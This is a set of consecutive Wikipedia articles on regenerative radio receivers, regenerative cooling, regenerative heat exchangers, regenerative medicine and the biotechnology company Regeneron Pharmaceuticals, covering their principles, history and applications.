Due partly to its tendency to radiate interference when oscillating, [ 6 ] [ 5 ] : p.190 by the 1930s the regenerative receiver was largely superseded by other TRF receiver designs (for example "reflex" receivers ) and especially by another Armstrong invention - superheterodyne receivers [ 10 ] and is largely considered obsolete. [ 5 ] : p.190 [ 11 ] Regeneration (now called positive feedback) is still widely used in other areas of electronics, such as in oscillators , active filters , and bootstrapped amplifiers .
A receiver circuit that used larger amounts of regeneration in a more complicated way to achieve even higher amplification, the superregenerative receiver , was also invented by Armstrong in 1922. [ 11 ] [ 5 ] : p.190 It was never widely used in general commercial receivers, but due to its small parts count it was used in specialized applications. One widespread use during WWII was IFF transceivers , where single tuned circuit completed the entire electronics system. It is still used in a few specialized low data rate applications, [ 11 ] such as garage door openers , [ 12 ] wireless networking devices, [ 11 ] walkie-talkies and toys.
The gain of any amplifying device, such as a vacuum tube , transistor , or op amp , can be increased by feeding some of the energy from its output back into its input in phase with the original input signal. This is called positive feedback or regeneration . [ 13 ] [ 3 ] Because of the large amplification possible with regeneration, regenerative receivers often use only a single amplifying element (tube or transistor). [ 14 ] In a regenerative receiver the output of the tube or transistor is connected back to its own input through a tuned circuit (LC circuit). [ 15 ] [ 16 ] The tuned circuit allows positive feedback only at its resonant frequency . In regenerative receivers using only one active device, the same tuned circuit is coupled to the antenna and also serves to select the radio frequency to be received, usually by means of variable capacitance. In the regenerative circuit discussed here, the active device also functions as a detector ; this circuit is also known as a regenerative detector . [ 16 ] A regeneration control is usually provided for adjusting the amount of feedback (the loop gain ). It is desirable for the circuit design to provide regeneration control that can gradually increase feedback to the point of oscillation and that provides control of the oscillation from small to larger amplitude and back to no oscillation without jumps of amplitude or hysteresis in control. [ 17 ] [ 18 ] [ 19 ] [ 20 ]
Two important attributes of a radio receiver are sensitivity and selectivity . [ 21 ] The regenerative detector provides sensitivity and selectivity due to voltage amplification and the characteristics of a resonant circuit consisting of inductance and capacitance. The regenerative voltage amplification u o {\displaystyle u_{\mathrm {o} }} is u o = u / ( 1 − u a ) {\displaystyle u_{\mathrm {o} }=u/(1-ua)} where u {\displaystyle u} is the non-regenerative amplification and a {\displaystyle a} is the portion of the output signal fed back to the L2 C2 circuit. As 1 − u a {\displaystyle 1-ua} becomes smaller the amplification increases. [ 22 ] The Q {\displaystyle Q} of the tuned circuit (L2 C2) without regeneration is Q = X L / R {\displaystyle Q=X_{\mathrm {L} }/R} where X L {\displaystyle X_{\mathrm {L} }} is the reactance of the coil and R {\displaystyle R} represents the total dissipative loss of the tuned circuit. The positive feedback compensates the energy loss caused by R {\displaystyle R} , so it may be viewed as introducing a negative resistance R r {\displaystyle R_{\mathrm {r} }} to the tuned circuit. [ 19 ] The Q {\displaystyle Q} of the tuned circuit with regeneration is Q r e g = X L / ( R − | R r | ) {\displaystyle Q_{\mathrm {reg} }=X_{\mathrm {L} }/(R-|R_{\mathrm {r} }|)} . [ 19 ] The regeneration increases the Q {\displaystyle Q} . Oscillation begins when | R r | = R {\displaystyle |R_{\mathrm {r} }|=R} . [ 19 ]
Regeneration can increase the detection gain of a detector by a factor of 1,700 or more. This is quite an improvement, especially for the low-gain vacuum tubes of the 1920s and early 1930s. The type 36 screen-grid tube (obsolete since the mid-1930s) had a non-regenerative detection gain (audio frequency plate voltage divided by radio frequency input voltage) of only 9.2 at 7.2 MHz, but in a regenerative detector, had detection gain as high as 7,900 at critical regeneration (non-oscillating) and as high as 15,800 with regeneration just above critical. [ 16 ] The "... non-oscillating regenerative amplification is limited by the stability of the circuit elements, tube [or device] characteristics and [stability of] supply voltages which determine the maximum value of regeneration obtainable without self-oscillation". [ 16 ] Intrinsically, there is little or no difference in the gain and stability available from vacuum tubes, JFETs, MOSFETs or bipolar junction transistors (BJTs).
A major improvement in stability and a small improvement in available gain for reception of CW radiotelegraphy is provided by the use of a separate oscillator, known as a heterodyne oscillator or beat oscillator . [ 16 ] [ 23 ] Providing the oscillation separately from the detector allows the regenerative detector to be set for maximum gain and selectivity - which is always in the non-oscillating condition. [ 16 ] [ 24 ] Interaction between the detector and the beat oscillator can be minimized by operating the beat oscillator at half of the receiver operating frequency, using the second harmonic of the beat oscillator in the detector. [ 23 ]
For AM reception, the gain of the loop is adjusted so it is just below the level required for oscillation (a loop gain of just less than one). The result of this is to greatly increase the gain of the amplifier at the bandpass frequency (resonant frequency), while not increasing it at other frequencies. So the incoming radio signal is amplified by a large factor, 10 3 - 10 5 , increasing the receiver's sensitivity to weak signals. The high gain also has the effect of reducing the circuit's bandwidth (increasing the Q ) by an equal factor, increasing the selectivity of the receiver. [ 25 ]
For the reception of CW radiotelegraphy ( Morse code ), the feedback is increased just to the point of oscillation. The tuned circuit is adjusted to provide typically 400 to 1000 Hertz difference between the receiver oscillation frequency and the desired transmitting station's signal frequency. The two frequencies beat in the nonlinear amplifier, generating heterodyne or beat frequencies. [ 26 ] The difference frequency, typically 400 to 1000 Hertz, is in the audio range; so it is heard as a tone in the receiver's speaker whenever the station's signal is present.
Demodulation of a signal in this manner, by use of a single amplifying device as oscillator and mixer simultaneously, is known as autodyne reception. [ 27 ] The term autodyne predates multigrid tubes and is not applied to use of tubes specifically designed for frequency conversion.
For the reception of single-sideband (SSB) signals, the circuit is also adjusted to oscillate as in CW reception. The tuning is adjusted until the demodulated voice is intelligible.
Regenerative receivers require fewer components than other types of receiver circuit, such as the TRF and superheterodyne . The circuit's advantage was that it got much more amplification (gain) out of the expensive vacuum tubes , thus reducing the number of tubes required and therefore the cost of a receiver. Early vacuum tubes had low gain and tended to oscillate at radio frequencies (RF). TRF receivers often required 5 or 6 tubes; each stage requiring tuning and neutralization, making the receiver cumbersome, power hungry, and hard to adjust. A regenerative receiver, by contrast, could often provide adequate reception with the use of only one tube. In the 1930s the regenerative receiver was replaced by the superheterodyne circuit in commercial receivers due to the superheterodyne's superior performance and the falling cost of tubes. Since the advent of the transistor in 1946, the low cost of active devices has removed most of the advantage of the circuit. However, in recent years the regenerative circuit has seen a modest comeback in receivers for low cost digital radio applications such as garage door openers , keyless locks , RFID readers and some cell phone receivers.
A disadvantage of this receiver, especially in designs that couple the detector tuned circuit to the antenna, is that the regeneration (feedback) level must be adjusted when the receiver is tuned to a different frequency. The antenna impedance varies with frequency, changing the loading of the input tuned circuit by the antenna, requiring the regeneration to be adjusted. In addition, the Q of the detector tuned circuit components vary with frequency, requiring adjustment of the regeneration control. [ 5 ] : p.189
A disadvantage of the single active device regenerative detector in autodyne operation is that the local oscillation causes the operating point to move significantly away from the ideal operating point, resulting in the detection gain being reduced. [ 24 ]
Another drawback is that when the circuit is adjusted to oscillate it can radiate a signal from its antenna, so it can cause interference to other nearby receivers. Adding an RF amplifier stage between the antenna and the regenerative detector can reduce unwanted radiation, but would add expense and complexity.
Other shortcomings of regenerative receivers are the sensitive and unstable tuning. These problems have the same cause: a regenerative receiver's gain is greatest when it operates on the verge of oscillation, and in that condition, the circuit behaves chaotically . [ 28 ] [ 29 ] [ 30 ] Simple regenerative receivers electrically couple the antenna to the detector tuned circuit, resulting in the electrical characteristics of the antenna influencing the resonant frequency of the detector tuned circuit. Any movement of the antenna or large objects near the antenna can change the tuning of the detector.
The inventor of FM radio, Edwin Armstrong , filed US patent 1113149 in 1913 about regenerative circuit while he was a junior in college. [ 31 ] He patented the superregenerative circuit in 1922, and the superheterodyne receiver in 1918.
Lee De Forest filed US patent 1170881 in 1914 that became the cause of a contentious lawsuit with Armstrong, whose patent for the regenerative circuit had been issued in 1914. The lawsuit lasted until 1934, winding its way through the appeals process and ending up at the Supreme Court . Armstrong won the first case, lost the second, stalemated at the third, and then lost the final round at the Supreme Court. [ 32 ] [ 33 ]
At the time the regenerative receiver was introduced, vacuum tubes were expensive and consumed much power, with the added expense and encumbrance of heavy batteries. So this design, getting most gain out of one tube, filled the needs of the growing radio community and immediately thrived. Although the superheterodyne receiver is the most common receiver in use today [ citation needed ] , the regenerative radio made the most out of very few parts.
In World War II the regenerative circuit was used in some military equipment. An example is the German field radio "Torn.E.b". [ 34 ] Regenerative receivers needed far fewer tubes and less power consumption for nearly equivalent performance.
A related circuit, the superregenerative detector , found several highly important military uses in World War II in Friend or Foe identification equipment and in the top-secret proximity fuze . An example here is the miniature RK61 thyratron marketed in 1938, which was designed specifically to operate like a vacuum triode below its ignition voltage, allowing it to amplify analog signals as a self-quenching superregenerative detector in radio control receivers, [ 35 ] and was the major technical development which led to the wartime development of radio-controlled weapons and the parallel development of radio controlled modelling as a hobby. [ 36 ]
In the 1930s, the superheterodyne design began to gradually supplant the regenerative receiver, as tubes became far less expensive. In Germany the design was still used in the millions of mass-produced German "peoples receivers" ( Volksempfänger ) and "German small receivers" (DKE, Deutscher Kleinempfänger). Even after WWII, the regenerative design was still present in early after-war German minimal designs along the lines of the "peoples receivers" and "small receivers", dictated by lack of materials. Frequently German military tubes like the "RV12P2000" were employed in such designs. There were even superheterodyne designs, which used the regenerative receiver as a combined IF and demodulator with fixed regeneration. The superregenerative design was also present in early FM broadcast receivers around 1950. Later it was almost completely phased out of mass production, remaining only in hobby kits, and some special applications, like gate openers.
The superregenerative receiver uses a second lower-frequency oscillation ( within the same stage or by using a second oscillator stage) to provide single-device circuit gains of around one million. This second oscillation periodically interrupts or "quenches" the main RF oscillation. [ 37 ] Ultrasonic quench rates between 30 and 100 kHz are typical. After each quenching, RF oscillation grows exponentially, starting from the tiny energy picked up by the antenna plus circuit noise. The amplitude reached at the end of the quench cycle (linear mode) or the time taken to reach limiting amplitude (log mode) depends on the strength of the received signal from which exponential growth started. A low-pass filter in the audio amplifier filters the quench and RF frequencies from the output, leaving the AM modulation. This provides a crude but very effective automatic gain control (AGC).
Superregenerative detectors work well for AM and can also be used for wide-band signals such as FM, where they perform "slope detection". Regenerative detectors work well for narrow-band signals, especially for CW and SSB which need a heterodyne oscillator or BFO. A superregenerative detector does not have a usable heterodyne oscillator – even though the superregen always self-oscillates, so CW (Morse code) and SSB (single side band) signals can't be received properly.
Superregeneration is most valuable above 27 MHz, and for signals where broad tuning is desirable. The superregen uses many fewer components for nearly the same sensitivity as more complex designs. It is easily possible to build superregen receivers which operate at microwatt power levels, in the 30 to 6,000 MHz range. It removes the need for the operator to manually adjust regeneration level to just below the point of oscillation - the circuit automatically is taken out of oscillation periodically, but with the disadvantage that small amounts of interference may be a problem for others. These are ideal for remote-sensing applications or where long battery life is important. For many years, superregenerative circuits have been used for commercial products such as garage-door openers, radar detectors, microwatt RF data links, and very low cost walkie-talkies.
Because the superregenerative detectors tend to receive the strongest signal and ignore other signals in the nearby spectrum, the superregen works best with bands that are relatively free of interfering signals. Due to Nyquist's theorem , its quenching frequency must be at least twice the signal bandwidth. But quenching with overtones acts further as a heterodyne receiver mixing additional unneeded signals from those bands into the working frequency. Thus the overall bandwidth of superregenerator cannot be less than 4 times that of the quench frequency, assuming the quenching oscillator produces an ideal sine wave. | https://en.wikipedia.org/wiki/Regenerative_circuit |
Regenerative cooling is a method of cooling gases in which compressed gas is cooled by allowing it to expand and thereby take heat from the surroundings. The cooled expanded gas then passes through a heat exchanger where it cools the incoming compressed gas. [ 1 ]
In 1857, Siemens introduced the regenerative cooling concept with the Siemens cycle . [ 2 ] In 1895, William Hampson in England [ 3 ] and Carl von Linde in Germany [ 4 ] independently developed and patented the Hampson–Linde cycle to liquefy air using the Joule–Thomson expansion process and regenerative cooling. [ 5 ] On 10 May 1898, James Dewar used regenerative cooling to become the first to statically liquefy hydrogen . | https://en.wikipedia.org/wiki/Regenerative_cooling |
A regenerative heat exchanger , or more commonly a regenerator , is a type of heat exchanger where heat from the hot fluid is intermittently stored in a thermal storage medium before it is transferred to the cold fluid. To accomplish this the hot fluid is brought into contact with the heat storage medium, then the fluid is displaced with the cold fluid, which absorbs the heat. [ 1 ]
In regenerative heat exchangers, the fluid on either side of the heat exchanger can be the same fluid. The fluid may go through an external processing step, and then it is flowed back through the heat exchanger in the opposite direction for further processing. Usually the application will use this process cyclically or repetitively.
Regenerative heating was one of the most important technologies developed during the Industrial Revolution when it was used in the hot blast process on blast furnaces . [ 2 ] It was later used in glass melting furnaces and steel making, to increase the efficiency of open hearth furnaces , and in high pressure boilers and chemical and other applications, where it continues to be important today.
The first regenerator was invented by Rev. Robert Stirling in 1816, and is also found as a component of some examples of his Stirling engine . The simplest Stirling engines, including most models, use the walls of the cylinder and displacer as a rudimentary regenerator, which is simpler and cheaper to construct but far less efficient.
Later applications included the blast furnace process known as hot blast and the open hearth furnace also called the Siemens regenerative furnace (which was used for making glass), where the hot exhaust gases from combustion are passed through firebrick regenerative chambers, which are thus heated. The flow is then reversed, so that the heated bricks preheat the fuel.
Edward Alfred Cowper applied the regeneration principle to blast furnaces, in the form of the "Cowper stove", patented in 1857. [ 3 ] This is almost invariably used with blast furnaces to this day.
Regenerators exchange heat from one process fluid to an intermediate solid heat storage medium, then that medium exchanges heat with a second process fluid flow. The two flows are either separated in time, alternately circulating through the storage medium, or are separated in space and the heat storage medium is moved between the two flows.
In rotary regenerators , or thermal wheels , the heat storage "matrix" in the form of a wheel or drum, that rotates continuously through two counter-flowing streams of fluid. In this way, the two streams are mostly separated. Only one stream flows through each section of the matrix at a time; however, over the course of a rotation, both streams eventually flow through all sections of the matrix in succession. The heat storage medium can be a relatively fine-grained set of metal plates or wire mesh, made of some resistant alloy or coated to resist chemical attack by the process fluids, or made of ceramics in high temperature applications. A large amount of heat transfer area can be provided in each unit volume of the rotary regenerator, compared to a shell-and-tube heat exchanger - up to 1000 square feet of surface can be contained in each cubic foot of regenerator matrix, compared to about 30 square feet in each cubic foot of a shell-and-tube exchanger. [ 4 ]
Each portion of the matrix will be nearly isothermal , since the rotation is perpendicular to both the temperature gradient and flow direction, and not through them. The two fluid streams flow counter-current. The fluid temperatures vary across the flow area; however the local stream temperatures are not a function of time. The seals between the two streams are not perfect, so some cross contamination will occur. The allowable pressure level of a rotary regenerator is relatively low, compared to heat exchangers.
In a fixed matrix regenerator , a single fluid stream has cyclical, reversible flow; it is said to flow "counter-current". This regenerator may be part of a valveless system, such as a Stirling engine . In another configuration, the fluid is ducted through valves to different matrices in alternate operating periods resulting in outlet temperatures that vary with time. For example, a blast furnace may have several "stoves" or "checkers" full of refractory fire brick. The hot gas from the furnace is ducted through the brickwork for some interval, say one hour, until the brick reaches a high temperature. Valves then operate and switch the cold intake air through the brick, recovering the heat for use in the furnace. Practical installations will have multiple stoves and arrangements of valves to gradually transfer flow between a "hot" stove and an adjacent "cold" stove, so that the variations in the outlet air temperature are reduced. [ 5 ]
Another type of regenerator is called a micro scale regenerative heat exchanger . It has a multilayer grating structure in which each layer is offset from the adjacent layer by half a cell which has an opening along both axes perpendicular to the flow axis. Each layer is a composite structure of two sublayers, one of a high thermal conductivity material and another of a low thermal conductivity material. When a hot fluid flows through the cell, heat from the fluid is transferred to the cell walls, and stored there. When the fluid flow reverses direction, heat is transferred from the cell walls back to the fluid.
A third type of regenerator is called a " Rothemühle " regenerator. This type has a fixed matrix in a disk shape, and streams of fluid are ducted through rotating hoods. The Rothemühle regenerator is used as an air preheater in power generating plants. The thermal design of this regenerator is the same as of other types of regenerators. [ citation needed ]
The nose and throat work as regenerative heat exchangers during breathing. The cooler air coming in is warmed, so that it reaches the lungs as warm air. On the way back out, this warmed air deposits much of its heat back onto the sides of the nasal passages, so that these passages are then ready to warm the next batch of air coming in. Some animals, including humans, have curled sheets of bone inside the nose called nasal turbinates to increase the surface area for heat exchange. [ citation needed ]
Regenerative heat exchangers are made up of materials with high volumetric heat capacity and low thermal conductivity in the longitudinal (flow) direction. At cryogenic (very low) temperatures around 20 K , the specific heat of metals is low, and so a regenerator must be larger for a given heat load. [ citation needed ]
The advantages of a regenerator over a recuperating (counter-flowing) heat exchanger is that it has a much higher surface area for a given volume, which provides a reduced exchanger volume for a given energy density, effectiveness and pressure drop. This makes a regenerator more economical in terms of materials and manufacturing, compared to an equivalent recuperator. [ citation needed ]
The design of inlet and outlet headers used to distribute hot and cold fluids in the matrix is much simpler in counter flow regenerators than recuperators. The reason behind this is that both streams flow in different sections for a rotary regenerator and one fluid enters and leaves one matrix at a time in a fixed-matrix regenerator. Furthermore, flow sectors for hot and cold fluids in rotary regenerators can be designed to optimize pressure drop in the fluids. The matrix surfaces of regenerators also have self-cleaning characteristics, reducing fluid-side fouling and corrosion. Finally properties such as small surface density and counter-flow arrangement of regenerators make it ideal for gas-gas heat exchange applications requiring effectiveness exceeding 85%. The heat transfer coefficient is much lower for gases than for liquids, thus the enormous surface area in a regenerator greatly increases heat transfer. [ citation needed ]
The major disadvantage of rotary and fixed-matrix regenerators is that there is always some mixing of the fluid streams, and they can not be completely separated. There is an unavoidable carryover of a small fraction of one fluid stream into the other. In the rotary regenerator, the carryover fluid is trapped inside the radial seal and in the matrix, and in a fixed-matrix regenerator, the carryover fluid is the fluid that remains in the void volume of the matrix. This small fraction will mix with the other stream in the following half-cycle. Therefore, rotary and fixed-matrix regenerators are only used when it is acceptable for the two fluid streams to be mixed. Mixed flow is common for gas-to-gas heat and/or energy transfer applications, and less common in liquid or phase-changing fluids since fluid contamination is often prohibited with liquid flows. [ citation needed ]
The constant alternation of heating and cooling that takes place in regenerative heat exchangers puts a lot of stress on the components of the heat exchanger, which can cause cracking or breakdown of materials. [ citation needed ] | https://en.wikipedia.org/wiki/Regenerative_heat_exchanger |
Regenerative medicine deals with the "process of replacing, engineering or regenerating human or animal cells, tissues or organs to restore or establish normal function". [ 1 ] This field holds the promise of engineering damaged tissues and organs by stimulating the body's own repair mechanisms to functionally heal previously irreparable tissues or organs. [ 2 ]
Regenerative medicine also includes the possibility of growing tissues and organs in the laboratory and implanting them when the body cannot heal itself. When the cell source for a regenerated organ is derived from the patient's own tissue or cells, [ 3 ] the challenge of organ transplant rejection via immunological mismatch is circumvented. [ 4 ] [ 5 ] [ 6 ] This approach could alleviate the problem of the shortage of organs available for donation.
Some of the biomedical approaches within the field of regenerative medicine may involve the use of stem cells . [ 7 ] Examples include the injection of stem cells or progenitor cells obtained through directed differentiation ( cell therapies ); the induction of regeneration by biologically active molecules administered alone or as a secretion by infused cells (immunomodulation therapy); and transplantation of in vitro grown organs and tissues ( tissue engineering ). [ 8 ] [ 9 ]
The ancient Greeks postulated whether parts of the body could be regenerated in the 700s BC. [ 10 ] Skin grafting, invented in the late 19th century, can be thought of as the earliest major attempt to recreate bodily tissue to restore structure and function. [ 11 ] Advances in transplanting body parts in the 20th century further pushed the theory that body parts could regenerate and grow new cells. These advances led to tissue engineering, and from this field, the study of regenerative medicine expanded and began to take hold. [ 10 ] This began with cellular therapy, which led to the stem cell research that is widely being conducted today. [ 12 ]
The first cell therapies were intended to slow the aging process. This began in the 1930s with Paul Niehans, a Swiss doctor who was known to have treated famous historical figures such as Pope Pius XII, Charlie Chaplin, and king Ibn Saud of Saudi Arabia. Niehans would inject cells of young animals (usually lambs or calves) into his patients in an attempt to rejuvenate them. [ 13 ] [ 14 ] In 1956, a more sophisticated process was created to treat leukemia by inserting bone marrow from a healthy person into a patient with leukemia. This process worked mostly due to both the donor and receiver in this case being identical twins. Nowadays, bone marrow can be taken from people who are similar enough to the patient who needs the cells to prevent rejection. [ 15 ]
The term "regenerative medicine" was first used in a 1992 article on hospital administration by Leland Kaiser. Kaiser's paper closes with a series of short paragraphs on future technologies that will impact hospitals. One paragraph had "Regenerative Medicine" as a bold print title and stated, "A new branch of medicine will develop that attempts to change the course of chronic disease and in many instances will regenerate tired and failing organ systems." [ 16 ] [ 17 ]
The term was brought into the popular culture in 1999 by William A. Haseltine when he coined the term during a conference on Lake Como, to describe interventions that restore to normal function that which is damaged by disease, injured by trauma, or worn by time. [ 18 ] Haseltine was briefed on the project to isolate human embryonic stem cells and embryonic germ cells at Geron Corporation in collaboration with researchers at the University of Wisconsin–Madison and Johns Hopkins School of Medicine . He recognized that these cells' unique ability to differentiate into all the cell types of the human body ( pluripotency ) had the potential to develop into a new kind of regenerative therapy. [ 19 ] [ 20 ] Explaining the new class of therapies that such cells could enable, he used the term "regenerative medicine" in the way that it is used today: "an approach to therapy that ... employs human genes, proteins and cells to re-grow, restore or provide mechanical replacements for tissues that have been injured by trauma, damaged by disease or worn by time" and "offers the prospect of curing diseases that cannot be treated effectively today, including those related to aging". [ 21 ] [ 22 ]
Later, Haseltine would go on to explain that regenerative medicine acknowledges the reality that most people, regardless of which illness they have or which treatment they require, simply want to be restored to normal health. Designed to be applied broadly, the original definition includes cell and stem cell therapies, gene therapy, tissue engineering, genomic medicine, personalized medicine, biomechanical prosthetics, recombinant proteins, and antibody treatments. It also includes more familiar chemical pharmacopeia—in short, any intervention that restores a person to normal health. In addition to functioning as shorthand for a wide range of technologies and treatments, the term "regenerative medicine" is also patient friendly. It solves the problem that confusing or intimidating language discourages patients.
The term regenerative medicine is increasingly conflated with research on stem cell therapies. Some academic programs and departments retain the original broader definition while others use it to describe work on stem cell research. [ 23 ]
From 1995 to 1998 Michael D. West , PhD, organized and managed the research between Geron Corporation and its academic collaborators James Thomson at the University of Wisconsin–Madison and John Gearhart of Johns Hopkins University that led to the first isolation of human embryonic stem and human embryonic germ cells, respectively. [ 24 ]
In March 2000, Haseltine, Antony Atala , M.D., Michael D. West, Ph.D., and other leading researchers founded E-Biomed: The Journal of Regenerative Medicine . [ 25 ] The peer-reviewed journal facilitated discourse around regenerative medicine by publishing innovative research on stem cell therapies, gene therapies, tissue engineering, and biomechanical prosthetics. The Society for Regenerative Medicine, later renamed the Regenerative Medicine and Stem Cell Biology Society, served a similar purpose, creating a community of like-minded experts from around the world. [ 26 ]
In June 2008, at the Hospital Clínic de Barcelona, Professor Paolo Macchiarini and his team, of the University of Barcelona , performed the first tissue engineered trachea (wind pipe) transplantation. Adult stem cells were extracted from the patient's bone marrow, grown into a large population, and matured into cartilage cells, or chondrocytes , using an adaptive method originally devised for treating osteoarthritis. The team then seeded the newly grown chondrocytes, as well as epithelial cells, into a decellularised (free of donor cells) tracheal segment that was donated from a 51-year-old transplant donor who had died of cerebral hemorrhage. After four days of seeding, the graft was used to replace the patient's left main bronchus. After one month, a biopsy elicited local bleeding, indicating that the blood vessels had already grown back successfully. [ 27 ] [ 28 ]
In 2009, the SENS Foundation was launched, with its stated aim as "the application of regenerative medicine – defined to include the repair of living cells and extracellular material in situ – to the diseases and disabilities of ageing". [ 29 ] In 2012, Professor Paolo Macchiarini and his team improved upon the 2008 implant by transplanting a laboratory-made trachea seeded with the patient's own cells. [ 30 ]
On September 12, 2014, surgeons at the Institute of Biomedical Research and Innovation Hospital in Kobe, Japan, transplanted a 1.3 by 3.0 millimeter sheet of retinal pigment epithelium cells, which were differentiated from iPS cells through directed differentiation , into an eye of an elderly woman, who suffers from age-related macular degeneration . [ 31 ]
In 2016, Paolo Macchiarini was fired from Karolinska University in Sweden due to falsified test results and lies. [ 32 ] The TV-show Experimenten aired on Swedish Television and detailed all the lies and falsified results. [ 33 ]
Widespread interest and funding for research on regenerative medicine has prompted institutions in the United States and around the world to establish departments and research institutes that specialize in regenerative medicine including: The Department of Rehabilitation and Regenerative Medicine at Columbia University , the Institute for Stem Cell Biology and Regenerative Medicine at Stanford University , the Center for Regenerative and Nanomedicine at Northwestern University , the Wake Forest Institute for Regenerative Medicine, and the British Heart Foundation Centers of Regenerative Medicine at the University of Oxford . [ 34 ] [ 35 ] [ 36 ] [ 37 ] In China, institutes dedicated to regenerative medicine are run by the Chinese Academy of Sciences , Tsinghua University , and the Chinese University of Hong Kong , among others. [ 38 ] [ 39 ] [ 40 ]
Regenerative medicine has been studied by dentists to find ways that damaged teeth can be repaired and restored to obtain natural structure and function. [ 42 ] Dental tissues are often damaged due to tooth decay, and are often deemed to be irreplaceable except by synthetic or metal dental fillings or crowns, which requires further damage to be done to the teeth by drilling into them to prevent the loss of an entire tooth.
Researchers from King's College London have created a drug called Tideglusib that claims to have the ability to regrow dentin, the second layer of the tooth beneath the enamel which encases and protects the pulp (often referred to as the nerve). [ 43 ]
Animal studies conducted on mice in Japan in 2007 show great possibilities in regenerating an entire tooth. Some mice had a tooth extracted and the cells from bioengineered tooth germs were implanted into them and allowed to grow. The result were perfectly functioning and healthy teeth, complete with all three layers, as well as roots. These teeth also had the necessary ligaments to stay rooted in its socket and allow for natural shifting. They contrast with traditional dental implants, which are restricted to one spot as they are drilled into the jawbone. [ 44 ] [ 45 ]
A person's baby teeth are known to contain stem cells that can be used for regeneration of the dental pulp after a root canal treatment or injury. These cells can also be used to repair damage from periodontitis, an advanced form of gum disease that causes bone loss and severe gum recession. Research is still being done to see if these stem cells are viable enough to grow into completely new teeth. Some parents even opt to keep their children's baby teeth in special storage with the thought that, when older, the children could use the stem cells within them to treat a condition. [ 46 ] [ 47 ]
Extracellular matrix materials are commercially available and are used in reconstructive surgery , treatment of chronic wounds , and some orthopedic surgeries ; as of January 2017 clinical studies were under way to use them in heart surgery to try to repair damaged heart tissue. [ 48 ] [ 49 ]
The use of fish skin with its natural constituent of omega 3 , has been developed by an Icelandic company Kereceis . [ 50 ] Omega 3 is a natural anti-inflammatory , and the fish skin material acts as a scaffold for cell regeneration. [ 51 ] [ 52 ] In 2016 their product Omega3 Wound was approved by the FDA for the treatment of chronic wounds and burns. [ 51 ] In 2021 the FDA gave approval for Omega3 Surgibind to be used in surgical applications including plastic surgery. [ 53 ]
Though uses of cord blood beyond blood and immunological disorders is speculative, some research has been done in other areas. [ 54 ] Any such potential beyond blood and immunological uses is limited by the fact that cord cells are hematopoietic stem cells (which can differentiate only into blood cells), and not pluripotent stem cells (such as embryonic stem cells , which can differentiate into any type of tissue). Cord blood has been studied as a treatment for diabetes. [ 55 ] However, apart from blood disorders, the use of cord blood for other diseases is not a routine clinical modality and remains a major challenge for the stem cell community. [ 54 ] [ 55 ]
Along with cord blood, Wharton's jelly and the cord lining have been explored as sources for mesenchymal stem cells (MSC), [ 56 ] and as of 2015 had been studied in vitro, in animal models, and in early stage clinical trials for cardiovascular diseases, [ 57 ] as well as neurological deficits, liver diseases, immune system diseases, diabetes, lung injury, kidney injury, and leukemia. [ 58 ] | https://en.wikipedia.org/wiki/Regenerative_medicine |
Regeneron Pharmaceuticals, Inc. is an American biotechnology company headquartered in Westchester County, New York . The company was founded in 1988. [ 2 ] Originally focused on neurotrophic factors and their regenerative capabilities, giving rise to its present name; the company has since expanded operations into the study of both cytokine and tyrosine kinase receptors, which gave rise to their first product, which is a VEGF -trap.
The company was founded by CEO Leonard Schleifer and scientist George Yancopoulos in 1988. [ 3 ]
Regeneron has developed aflibercept , a VEGF inhibitor, and rilonacept , an interleukin-1 blocker. VEGF is a protein that normally stimulates the growth of blood vessels, and interleukin-1 is a protein that is normally involved in inflammation. [ citation needed ]
On March 26, 2012, Bloomberg announced that Sanofi and Regeneron were in development of a new drug that would help reduce cholesterol up to 72% more than its competitors. The new drug would target the PCSK9 gene. [ 4 ]
In July 2015, the company announced a new global collaboration with Sanofi to discover, develop, and commercialize new immuno-oncology drugs, which could generate more than $2 billion for Regeneron, [ 5 ] with $640 million upfront, $750 million for proof-of-concept data, and $650 million from the development of REGN2810 . [ 6 ] REGN2810 was later named cemiplimab. In 2019, Regeneron Pharmaceuticals was announced the 7th best publicly listed company of the 2010s, with a total return of 1,457%. [ 7 ] Regeneron Pharmaceuticals was home to the two highest-paid pharmaceutical executives as of 2020. [ 8 ]
In October 2017, Regeneron made a deal with the Biomedical Advanced Research and Development Authority (BARDA) that the U.S. government would fund 80% of the costs for Regeneron to develop and manufacture antibody-based medications, which subsequently, in 2020, included their COVID-19 treatments, and Regeneron would retain the right to set prices and control production. [ 9 ] This deal was criticized in The New York Times . [ 8 ] Such deals are not unusual for routine drug development in the American pharmaceutical market.
In 2019, the company was added to the Dow Jones Sustainability World Index . [ 10 ]
In May 2020, Regeneron announced it would repurchase approx. 19.2 million of its shares for around $5 billion, held directly by Sanofi. Prior to the transaction, Sanofi held 23.2 million Regeneron shares. [ 11 ] [ 12 ]
In April 2022, the business announced it would acquire Checkmate Pharmaceuticals for around $250 million, enhancing its number of immuno-oncology drugs. [ 13 ]
In August 2023, Regeneron announced it would acquire Decibel Therapeutics. [ 14 ]
In December 2023, Regeneron acquired an Avon Products property in Suffern, New York to be used for cold storage, research and development laboratories [ 15 ]
In April 2024, the company acquired 2seventy Bio . [ 16 ]
In May 2025, the company was awarded $135.6 million in compensatory damages and $271.2 million in punitive damages in the United States District Court for the District of Delaware in a victorious antitrust case filed against Amgen . Regeneron alleged Amgen employed anticompetitive practices to exclude Praluent from the market and elevate Amgen's rival Repatha . [ 17 ]
As of May 2025, the company is to buy 23andMe for $256 million. [ 18 ] [ 19 ]
On February 4, 2020, the U.S. Department of Health and Human Services , which already worked with Regeneron, announced that Regeneron would pursue monoclonal antibodies to fight COVID-19. [ 20 ]
In July 2020, under Operation Warp Speed , Regeneron was awarded a $450 million government contract to manufacture and supply its experimental treatment REGN-COV2 , an artificial "antibody cocktail" which was then undergoing clinical trials for its potential both to treat people with COVID-19 and to prevent SARS-CoV-2 coronavirus infection. [ 21 ] [ 22 ] [ 23 ] The $450 million came from the Biomedical Advanced Research and Development Authority (BARDA), the DoD Joint Program Executive Office for Chemical, Biological, Radiological and Nuclear Defense, and Army Contracting Command . Regeneron expected to produce 70,000–300,000 treatment doses or 420,000–1,300,000 prevention doses. "By funding this manufacturing effort, the federal government will own the doses expected to result from the demonstration project," the government said in its July 7 news release. [ 24 ] Regeneron similarly said in its own news release that same day that "the government has committed to making doses from these lots available to the American people at no cost and would be responsible for their distribution," noting that this depended on the government granting emergency use authorization or product approval. [ 25 ] California based laboratory, FOMAT, is part of the clinical investigation through their doctors Augusto and Nicholas Focil. [ 26 ]
